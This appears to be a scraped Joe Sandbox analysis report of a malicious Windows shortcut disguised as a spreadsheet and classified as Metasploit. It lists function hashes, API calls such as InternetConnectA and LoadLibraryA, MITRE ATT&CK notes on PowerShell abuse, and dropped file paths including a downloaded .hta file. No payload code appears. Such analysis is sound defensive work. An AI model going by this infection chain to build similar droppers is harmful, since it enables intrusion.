Function 00007FFC3DA74387 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2071013448.00007FFC3DA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3da70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f64cfe163c22366f4bc4d1f8bb97ec50b5aa18c10afd77ad10801fc3523a22
Instruction ID: 5a38bb7c90127f313ab5941c7b199bbcba1c4dbd346d8492164afdfb594dcc3c
Opcode Fuzzy Hash: 38f64cfe163c22366f4bc4d1f8bb97ec50b5aa18c10afd77ad10801fc3523a22
Instruction Fuzzy Hash: 28F0657275CA054FDB0CE61CF8429B4B3E4EB95320710052EE587C3A52D927F8538AC5

Function 00007FFC3DB4156B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2071574643.00007FFC3DB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3db40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11132fd0d3020139adaed2e5dbe7347ef35d73efa3e0983a276114d340dc4b4
Instruction ID: cc2398a284b48e67c217be7fd9d4bd9028ea1c55c487c7f1424d089229273422
Opcode Fuzzy Hash: c11132fd0d3020139adaed2e5dbe7347ef35d73efa3e0983a276114d340dc4b4
Instruction Fuzzy Hash: 45B09222748C280B9AA4A19CB8482A822E0C298A3130512A7E809E3248DA094DC203C5

Analysis Process: powershell.exePID: 7812, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	33.3%
Total number of Nodes:	12
Total number of Limit Nodes:	1

Executed Functions

Function 077D00D7 Relevance: 1.7, APIs: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(56A2B5F0,?,696E6977,0074656E), ref: 077D02ED

Memory Dump Source

Source File: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c6a37002d5e2ae635905fe29e468e9948d4b32d2faac038429c5fd609d85d945
Instruction ID: 3faede5caf62bb9813e77d8479c92c2cf772b4444da0a9856b3ad4f59f8de3f7
Opcode Fuzzy Hash: c6a37002d5e2ae635905fe29e468e9948d4b32d2faac038429c5fd609d85d945
Instruction Fuzzy Hash: 5A61BEF151A3D679E7214B368C4AF677F79EF83690F18289CE1905B093E550EC01C3AA

Function 077D00BA Relevance: 1.5, APIs: 1, Instructions: 30
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(C69F8957,00000000,077D0331,000020FB,00000000,00000000,00000003,00000000,00000000,?,696E6977,0074656E), ref: 077D00CF

Memory Dump Source

Source File: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: 07a1f289859aa8257f52f3eb96be97467543ee063e50254d24392e6b4541b945
Instruction ID: 5b5b62399da41dac8125565d53626e1cd288f85858d85b75dd496e721757bf99
Opcode Fuzzy Hash: 07a1f289859aa8257f52f3eb96be97467543ee063e50254d24392e6b4541b945
Instruction Fuzzy Hash: 3BE0DFE06B43067EF4281E24CE9BEBF272DC3202D0F042E1AB659684C1B4D2AE01C179

Function 077D02D5 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(56A2B5F0,?,696E6977,0074656E), ref: 077D02ED

Memory Dump Source

Source File: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: ee0dfff30c0374f97f67a799fce4575d232558016e124d280d061d76dbab74af
Instruction ID: 1fcd3a9f3a84bab7241dcb5d15dabeb46a5717a5e562ee8d1622c79190bc0291
Opcode Fuzzy Hash: ee0dfff30c0374f97f67a799fce4575d232558016e124d280d061d76dbab74af
Instruction Fuzzy Hash: 8BC08C02826A957A83124230C89A3CEBB442806211328888AC0900B561C318C2028297

Function 077D008F Relevance: 1.5, APIs: 1, Instructions: 7
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(0726774C,?,696E6977,0074656E), ref: 077D00A0

Memory Dump Source

Source File: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_77d0000_powershell.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5a947e7f3338d89dec675f7ce1a8893158c68d3fedbd9699ec035027427ea175
Instruction ID: 2582ad0d9d5a24fa2167fb5e8a14ea7ef5c585ebe95de1be83fe0f536dbd3f1a
Opcode Fuzzy Hash: 5a947e7f3338d89dec675f7ce1a8893158c68d3fedbd9699ec035027427ea175
Instruction Fuzzy Hash: D5A002C06DB30DB745427A729E0BD6D7D258803AEDF816112F59D24989098B55748077

Function 049E5160 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1369768726.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d23a889285d0952f78868e039f48ee68811f71dc6bdb7d17c4b4a7ddf332a96e
Instruction ID: 24120b1ff109a89cbe9a98401ed8890d6891810917d5ab98932236f3c71d5383
Opcode Fuzzy Hash: d23a889285d0952f78868e039f48ee68811f71dc6bdb7d17c4b4a7ddf332a96e
Instruction Fuzzy Hash: 08A18D74A00205DFCB16CF99C494AAEFBB2FF88324B258569E5159B361D735FC41CBA0

Function 049E4043 Relevance: .2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1369768726.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 770c21b947241c7066881381e1c90a4fc3447901ee0792320152924f30244b0b
Instruction ID: e6d0c94e1716dc741c2acfa3e11d9933bcdb107db7109a948e52228d12bfdfce
Opcode Fuzzy Hash: 770c21b947241c7066881381e1c90a4fc3447901ee0792320152924f30244b0b
Instruction Fuzzy Hash: 3571802580E3C08FEB039B7888A419B7F719F97254B0E41E3C0D0DF1E7D624A949CBA6

Function 049E5270 Relevance: .1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1369768726.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55534ceb3e4b49bb618c4d7b399f82185256ff4881079ffc9d96caaa0ba921e
Instruction ID: c55501544518b98cf4ab45ac32b76128a70169b00652fdf7ce6b4d5f5f44614f
Opcode Fuzzy Hash: e55534ceb3e4b49bb618c4d7b399f82185256ff4881079ffc9d96caaa0ba921e
Instruction Fuzzy Hash: 0E414D74A00605EFCB1ACF99C094AAEFBB1FF48324B158569D505AB365C736FC91CBA0

Function 049E4150 Relevance: .1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1369768726.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84acc1be7ae4e783bc3f9c69723161bf9f59c3ab2e1c1e901850a6e96749b72
Instruction ID: 9e6d6ab54f01492f47d17a9d9e9f658c261cab9f41089cf8d057b46eefcdb8e8
Opcode Fuzzy Hash: e84acc1be7ae4e783bc3f9c69723161bf9f59c3ab2e1c1e901850a6e96749b72
Instruction Fuzzy Hash: 12215074A04219DFDB01CF99C8809AEFBB5FF89310B148496D415DB352C735ED41CBA1

Function 02C5D005 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1367744344.0000000002C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee5771951bc0818119ca11614a0d218bd47a722905f17ae14e15352873c6e68
Instruction ID: 486071f4fb6a22a5c448661e1e5b59112109431c5626f014d9f32463da079cc2
Opcode Fuzzy Hash: 6ee5771951bc0818119ca11614a0d218bd47a722905f17ae14e15352873c6e68
Instruction Fuzzy Hash: DF01406100E3D05FD7128B258994756BFB8DF83224F1D81DBD8888F1A3D2699849C7B2

Function 02C5D01D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.1367744344.0000000002C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c5d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efaf6cb6f4434c83b10ace72ba6dbeaa8809f308e07207f8eb1341f367e667f3
Instruction ID: e4e5b3323b5171901ed76a6607ba3b2a5d5fc9023e21c46962a5509d49fafb0b
Opcode Fuzzy Hash: efaf6cb6f4434c83b10ace72ba6dbeaa8809f308e07207f8eb1341f367e667f3
Instruction Fuzzy Hash: 6001F731405350DEE7204A12CDC4767BB98DFC1624F088019EC4A4F282D779D9C6CAFA

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ____ ______.xls.lnk.bin.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-ServerMode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jmsghcu.4qh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mlg4ktp.uh3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1gecwjj.nan.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5nawkyx.gfg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u21k0mxa.jz0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3v2gqbj.5kq.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IIGEBA1B1MCN0DFQC4KH.temp

Windows Analysis Report
__.xls.lnk.bin.lnk

Function 077D00D7 Relevance: 1.7, APIs: 1, Instructions: 227
COMMON

Function 077D00BA Relevance: 1.5, APIs: 1, Instructions: 30
networkCOMMON

Function 077D02D5 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON